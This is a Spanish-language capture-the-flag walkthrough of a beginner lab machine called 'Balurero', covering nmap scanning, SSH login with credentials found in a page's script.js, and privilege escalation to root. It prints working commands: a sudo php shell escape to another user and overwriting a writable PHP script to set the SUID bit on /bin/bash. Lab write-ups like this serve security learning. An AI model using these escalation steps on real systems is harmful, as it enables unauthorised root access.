Balurero

✍️ Autor: El Pingüino de Mario🔍 Dificultad: Fácil 📅 Fecha de creación: 28/09/2024

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 172.17.0.2

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sVC -p- -n --min-rate 5000 172.17.0.2

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80 -v 172.17.0.2

para obtener más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web sea una página sobre Balú el perro de Mario.

Revisando el código fuente y todos sus archivos encontramos en el script.js un mensaje que nos llama la atención.

🚀 EXPLOTACIÓN

Entramos a través del navegador a ese directorio.

Tras encontrar sus credenciales nos logueamosa tavés de SSH.

ssh balu@172.17.0.2

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar.

Nos llama la atención php por lo que buscamos en esta página cómo explotarlo.

sudo -u chocolate php -r "system('/bin/bash');"

Somos el usuario chocolate pero no tenemos permisos SUDO.

Revisando los directorios encontramos un archivo llamado script.php por lo que miramos si se puede modificar para obtener una shell.

echo -e "<?php\n\tsystem('chmod u+s /bin/bash');\n?>" > /opt/script.php
bash -p

Ya somos root.